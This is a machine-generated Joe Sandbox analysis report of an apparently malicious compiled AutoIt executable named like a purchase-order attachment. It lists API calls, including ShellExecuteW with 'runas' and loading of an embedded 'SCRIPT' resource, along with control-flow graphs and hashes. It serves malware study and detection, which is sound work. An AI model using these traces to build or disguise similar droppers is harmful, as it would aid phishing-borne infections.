                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0049DAB4,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D89
                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00403AA3), ref: 00471D90
                                                                                                                                                                                                        • Part of subcall function 00403E6E: GetSysColorBrush.USER32(0000000F), ref: 00403E79
                                                                                                                                                                                                        • Part of subcall function 00403E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
                                                                                                                                                                                                        • Part of subcall function 00403E6E: LoadIconW.USER32(00000063), ref: 00403E9E
                                                                                                                                                                                                        • Part of subcall function 00403E6E: LoadIconW.USER32(000000A4), ref: 00403EB0
                                                                                                                                                                                                        • Part of subcall function 00403E6E: LoadIconW.USER32(000000A2), ref: 00403EC2
                                                                                                                                                                                                        • Part of subcall function 00403E6E: RegisterClassExW.USER32(?), ref: 00403F30
                                                                                                                                                                                                        • Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004036E6
                                                                                                                                                                                                        • Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
                                                                                                                                                                                                        • Part of subcall function 004036B8: ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 0040371B
                                                                                                                                                                                                        • Part of subcall function 004036B8: ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 00403724
                                                                                                                                                                                                        • Part of subcall function 00404FFC: _memset.LIBCMT ref: 00405022
                                                                                                                                                                                                        • Part of subcall function 00404FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004050CB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                                                                      • String ID: ()K$This is a third-party compiled AutoIt script.$runas
                                                                                                                                                                                                      • API String ID: 438480954-361992462
                                                                                                                                                                                                      • Opcode ID: 7d89592413dc87b76cbc47995619ff8f5c7103c149ad73e2d280106dc8544858
                                                                                                                                                                                                      • Instruction ID: 8c2ea3201cdb187de0b382d93636e43dc28cc5d5927fe16ad7bbb767c2a6e17f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d89592413dc87b76cbc47995619ff8f5c7103c149ad73e2d280106dc8544858
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B51D230E04248AACF11ABB5DC41EEE7B799B0A704F04817FF541762E2CE7C4A458B6D

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2132 41ddc0-41de4f call 40d7f7 GetVersionExW call 406a63 call 41dfb4 call 406571 2141 41de55-41de56 2132->2141 2142 4724c8-4724cb 2132->2142 2143 41de92-41dea2 call 41df77 2141->2143 2144 41de58-41de63 2141->2144 2145 4724e4-4724e8 2142->2145 2146 4724cd 2142->2146 2163 41dea4-41dec1 GetCurrentProcess call 41df5f 2143->2163 2164 41dec7-41dee1 2143->2164 2147 41de69-41de6b 2144->2147 2148 47244e-472454 2144->2148 2151 4724d3-4724dc 2145->2151 2152 4724ea-4724f3 2145->2152 2150 4724d0 2146->2150 2153 41de71-41de74 2147->2153 2154 472469-472475 2147->2154 2156 472456-472459 2148->2156 2157 47245e-472464 2148->2157 2150->2151 2151->2145 2152->2150 2158 4724f5-4724f8 2152->2158 2161 472495-472498 2153->2161 2162 41de7a-41de89 2153->2162 2159 472477-47247a 2154->2159 2160 47247f-472485 2154->2160 2156->2143 2157->2143 2158->2151 2159->2143 2160->2143 2161->2143 2165 47249e-4724b3 2161->2165 2166 47248a-472490 2162->2166 2167 41de8f 2162->2167 2163->2164 2184 41dec3 2163->2184 2169 41df31-41df3b GetSystemInfo 2164->2169 2170 41dee3-41def7 call 41e00c 2164->2170 2172 4724b5-4724b8 2165->2172 2173 4724bd-4724c3 2165->2173 2166->2143 2167->2143 2175 41df0e-41df1a 2169->2175 2179 41df29-41df2f GetSystemInfo 2170->2179 2180 41def9-41df01 call 41dff4 GetNativeSystemInfo 2170->2180 2172->2143 2173->2143 2177 41df21-41df26 2175->2177 2178 41df1c-41df1f FreeLibrary 2175->2178 2178->2177 2183 41df03-41df07 2179->2183 2180->2183 2183->2175 2186 41df09-41df0c FreeLibrary 2183->2186 2184->2164 2186->2175
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 0041DDEC
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,0049DC38,?,?), ref: 0041DEAC
                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF01
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF0C
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF1F
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF29
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF35
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3851250370-0
                                                                                                                                                                                                      • Opcode ID: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
                                                                                                                                                                                                      • Instruction ID: 8d0e3f8703e641f7dc44be798b40e30172c8f454d63aad706eb8f519579aa2d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE61A4B1C0A384DBCF15CF6498C01EA7FB46F29300B1989DAD8495F34BC628C649CB6E

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2234 40406b-404083 CreateStreamOnHGlobal 2235 4040a3-4040a6 2234->2235 2236 404085-40409c FindResourceExW 2234->2236 2237 474f16-474f25 LoadResource 2236->2237 2238 4040a2 2236->2238 2237->2238 2239 474f2b-474f39 SizeofResource 2237->2239 2238->2235 2239->2238 2240 474f3f-474f4a LockResource 2239->2240 2240->2238 2241 474f50-474f58 2240->2241 2242 474f5c-474f6e 2241->2242 2242->2238
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0040449E,?,?,00000000,00000001), ref: 0040407B
                                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0040449E,?,?,00000000,00000001), ref: 00404092
                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F1A
                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F2F
                                                                                                                                                                                                      • LockResource.KERNEL32(0040449E,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB,00000000), ref: 00474F42
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                                      • Opcode ID: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
                                                                                                                                                                                                      • Instruction ID: f77eb1c464526354bceaabec8d79980ec563cae601d2e2506ae7cf38a943322b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27112E71600701AFE7219B65EC48F677BB9EBC5B51F1045BDF612A62D0DB75DC008A24
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00472F49), ref: 00446CB9
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00446CCA
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00446CDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 48322524-0
                                                                                                                                                                                                      • Opcode ID: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
                                                                                                                                                                                                      • Instruction ID: 78d71e6d327d38dcb7c1aa5d0e34089853346cf5f0f87180683a2751a0062266
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AE0D831C1151057A2146738EC4D8EE376CDE06339F100B1AF871C12D0EB74D90046DF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                      • String ID: L
                                                                                                                                                                                                      • API String ID: 3964851224-249544069
                                                                                                                                                                                                      • Opcode ID: 310886f7a74512a53041a1297588b07bc8685f270046a95c51a28cc9f3919146
                                                                                                                                                                                                      • Instruction ID: 7c9fdd5cd437a79d1c3c0ac98f7823f3fe2e1a6fd868af1480b8a04681f0d1cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 310886f7a74512a53041a1297588b07bc8685f270046a95c51a28cc9f3919146
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8927E706083419FD714DF19C480BABB7E1BF84308F14885EE99A8B352D779ED85CB5A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 8e830bf555112b2ad5d4f280f039b4480d517733cda6932f23b6fc571beb1657
                                                                                                                                                                                                      • Instruction ID: 8c316f122af884e65fd23efdceb602b2cf0fe7a3b43f3523b9e3e47a843a4e61
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e830bf555112b2ad5d4f280f039b4480d517733cda6932f23b6fc571beb1657
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F912D170A04205DFDB24DF56C480AAAB7B0FF14304F54C87BD949AB391E339AD96CB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959
                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0040EBFA
                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040ED2E
                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040ED3F
                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0040ED4A
                                                                                                                                                                                                      • LockWindowUpdate.USER32(00000000), ref: 0040ED79
                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 0040ED85
                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040ED9F
                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00475270
                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004759F7
                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00475A05
                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00475A19
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                                                      • API String ID: 2641332412-570651680
                                                                                                                                                                                                      • Opcode ID: fd1537bac21e21918f44387b280ddf5fa984ab1e9dbd8ad4a2720d7b6d06c9d0
                                                                                                                                                                                                      • Instruction ID: 30b0b18e468af62d7d02d398255fc33e35c629728c4d1f4c1ebb194875fc3dde
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd1537bac21e21918f44387b280ddf5fa984ab1e9dbd8ad4a2720d7b6d06c9d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE62A370508340DFE724DF25C885BAA77E4BF44304F04497FE94A9B2D2DBB9A849CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00435EC3
                                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00435F04
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F2D
                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00435F34
                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F47
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F6A
                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00435F73
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F7C
                                                                                                                                                                                                      • __set_osfhnd.LIBCMT ref: 00435FAC
                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00436016
                                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 0043603C
                                                                                                                                                                                                      • __chsize_nolock.LIBCMT ref: 0043606C
                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 0043607E
                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00436176
                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 0043618B
                                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 004361EB
                                                                                                                                                                                                        • Part of subcall function 0042EA9C: CloseHandle.KERNEL32(00000000,004AEEF4,00000000,?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAEC
                                                                                                                                                                                                        • Part of subcall function 0042EA9C: GetLastError.KERNEL32(?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAF6
                                                                                                                                                                                                        • Part of subcall function 0042EA9C: __free_osfhnd.LIBCMT ref: 0042EB03
                                                                                                                                                                                                        • Part of subcall function 0042EA9C: __dosmaperr.LIBCMT ref: 0042EB25
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 0043620D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00436342
                                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00436361
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043636E
                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00436375
                                                                                                                                                                                                      • __free_osfhnd.LIBCMT ref: 00436395
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 004363C3
                                                                                                                                                                                                      • __wsopen_helper.LIBCMT ref: 004363DD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                      • API String ID: 3896587723-2766056989
                                                                                                                                                                                                      • Opcode ID: 8c7789bed706ede18dd530b1e3ad8405d4c3b2db8187d7ab4351d5d6ff389688
                                                                                                                                                                                                      • Instruction ID: 258e66036f6fd46d17c8d5113c19e8d7647eaa250339654dbaeb5c90e1d5d4d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c7789bed706ede18dd530b1e3ad8405d4c3b2db8187d7ab4351d5d6ff389688
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11224871A00506ABEF299F68DC46BAF7B71EB08314F25926BE9119B3D1C33D8D40C759

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044FA96
                                                                                                                                                                                                      • _wcschr.LIBCMT ref: 0044FAA4
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044FABB
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044FACA
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044FAE8
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044FB09
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0044FBE6
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044FC0B
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044FC1D
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044FC32
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044FC47
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044FC59
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044FC6E
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: _wcscmp.LIBCMT ref: 0044C03E
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C083
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: _wcscpy.LIBCMT ref: 0044C096
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0A9
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C0CE
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0E4
                                                                                                                                                                                                        • Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0F7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
